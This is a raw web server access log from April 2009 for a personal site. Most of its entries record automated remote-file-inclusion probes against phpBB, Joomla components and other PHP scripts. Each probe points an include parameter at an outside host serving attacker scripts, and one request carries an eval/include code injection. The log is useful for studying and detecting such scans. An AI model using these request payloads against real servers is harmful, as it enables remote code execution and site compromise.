91.195.124.10 - - [28/Apr/2009:09:07:36 -0700] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.86.169.162 - - [28/Apr/2009:09:07:43 -0700] "GET /logs/access_080611.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.169.162 - - [28/Apr/2009:09:07:43 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.169.162 - - [28/Apr/2009:09:07:43 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.169.162 - - [28/Apr/2009:09:07:43 -0700] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:07:48 -0700] "GET /logs/access_090403.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:09:07:48 -0700] "GET /logs/access_081124.log%20/?prefix=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:09:07:49 -0700] "GET /logs/?prefix=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 200 97188 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:08:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:08:13 -0700] "GET /logs/access_090415.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:08:17 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:08:33 -0700] "GET /logs/access_080313.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:09:08:41 -0700] "GET /logs/access_080419.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.75.152.97 - - [28/Apr/2009:09:08:42 -0700] "GET /xfkcfllkcaaamhnod.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:09:08:44 -0700] "GET /?prefix=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 200 43288 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [28/Apr/2009:09:08:44 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [28/Apr/2009:09:08:44 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [28/Apr/2009:09:08:44 -0700] "GET /logs/access_080419.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [28/Apr/2009:09:08:44 -0700] "GET /logs/access_080611.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.52.110.170 - - [28/Apr/2009:09:08:50 -0700] "GET /logs/access_080313.log///?_SERVER[DOCUMENT_ROOT]=http://coastaldistribution.com/home/administrator/images/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.110.170 - - [28/Apr/2009:09:08:55 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.251.217.4 - - [28/Apr/2009:09:09:03 -0700] "GET /logs/access_090109.log///?_SERVER[DOCUMENT_ROOT]=http://polar.ustc.edu.cn/polarch//uploads/fx29id2.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.98.212.6 - - [28/Apr/2009:09:09:04 -0700] "GET /logs/access_090118.log//components/errors.php?error=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.98.212.6 - - [28/Apr/2009:09:09:04 -0700] "GET /components/errors.php?error=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.98.212.6 - - [28/Apr/2009:09:09:04 -0700] "GET /logs//components/errors.php?error=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:09:04 -0700] "GET /logs/access_080313.log//?path%5Bdocroot%5D=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.98.212.6 - - [28/Apr/2009:09:09:10 -0700] "GET /logs/access_080502.log//components/errors.php?error=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.239.112.19 - - [28/Apr/2009:09:09:12 -0700] "GET /logs/access_081121.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:09:09:21 -0700] "GET /logs/access_080611.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:09:09:21 -0700] "GET /logs/access_080419.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:09:34 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:09:34 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.242.84 - - [28/Apr/2009:09:09:38 -0700] "GET /logs/access_081124.log%20/?prefix=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:10:09 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:10:09 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:09:10:41 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:09:10:44 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:09:10:45 -0700] "GET /logs/access_080403.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:09:10:54 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:09:10:57 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.53.125 - - [28/Apr/2009:09:11:20 -0700] "GET /logs/access_080419.log%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:09:12:41 -0700] "GET /logs/access_080925.log/?prefix=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.169.162 - - [28/Apr/2009:09:12:44 -0700] "GET /logs/access_080419.log%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:09:12:46 -0700] "GET /logs/access_080403.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:13:22 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:28 -0700] "GET /pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:28 -0700] "GET /logs/access_090120.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:28 -0700] "GET /logs//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:28 -0700] "GET /logs/access_090105.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:35 -0700] "GET /logs/access_090120.log%20%20//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:35 -0700] "GET /pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:35 -0700] "GET /logs//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:35 -0700] "GET /logs/access_090105.log%20%20//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:51 -0700] "GET /logs/access_080812.log%20%20//admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:51 -0700] "GET /admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:13:51 -0700] "GET /logs//admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:14:07 -0700] "GET /pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:14:07 -0700] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:14:07 -0700] "GET /logs//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:14:09 -0700] "GET /logs/access_090120.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:14:29 -0700] "GET /logs/access_090120.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:14:32 -0700] "GET /pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:14:32 -0700] "GET /logs//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:14:36 -0700] "GET /logs/access_090105.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.123.237.124 - - [28/Apr/2009:09:15:01 -0700] "GET /logs/access_081124.log/?prefix=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:15:05 -0700] "GET /logs/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 97188 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:15:09 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:15:09 -0700] "GET /logs/access_080720.log%20%20/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:15:10 -0700] "GET /logs/access_090120.log%20%20//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:15:11 -0700] "GET /pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:15:14 -0700] "GET /logs//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:15:14 -0700] "GET /logs/access_090105.log%20%20//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:15:15 -0700] "GET /logs/access_080925.log%20%20/?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:15:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:15:40 -0700] "GET /admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:15:40 -0700] "GET /logs//admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.167.2 - - [28/Apr/2009:09:15:40 -0700] "GET /logs/access_080812.log//admin/index.php?action=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.98.212.6 - - [28/Apr/2009:09:15:41 -0700] "GET /logs/access_090118.log%20%20//components/errors.php?error=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:15:42 -0700] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:15:42 -0700] "GET /pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:15:43 -0700] "GET /logs//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.98.212.6 - - [28/Apr/2009:09:15:46 -0700] "GET /logs/access_080502.log%20%20//components/errors.php?error=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:15:51 -0700] "GET /?_zb_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 43272 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.15.142 - - [28/Apr/2009:09:15:52 -0700] "GET /logs/access_080905.log HTTP/1.0" 200 840070 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:16:00 -0700] "GET /logs/access_090120.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:16:00 -0700] "GET /pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:16:01 -0700] "GET /logs//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:16:02 -0700] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.7.201.86 - - [28/Apr/2009:09:16:24 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.7.201.86 - - [28/Apr/2009:09:16:28 -0700] "GET /logs/access_080802.log/errors.php?error=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.247.250.222 - - [28/Apr/2009:09:16:31 -0700] "GET /logs/access_090120.log//pixlie/pixlie.php?root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:16:38 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:16:38 -0700] "GET /logs/access_090217.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:16:38 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:42 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:42 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:42 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:49 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:49 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:49 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:49 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:52 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:52 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:16:53 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:56 -0700] "GET /logs/access_090209.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:57 -0700] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:57 -0700] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:57 -0700] "GET /logs/access_081212.log/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Apr/2009:09:16:57 -0700] "GET /logs/access_081130.log/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:07 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:08 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:08 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:08 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:08 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:17:09 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:17:09 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:17:09 -0700] "GET /logs/access_090217.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
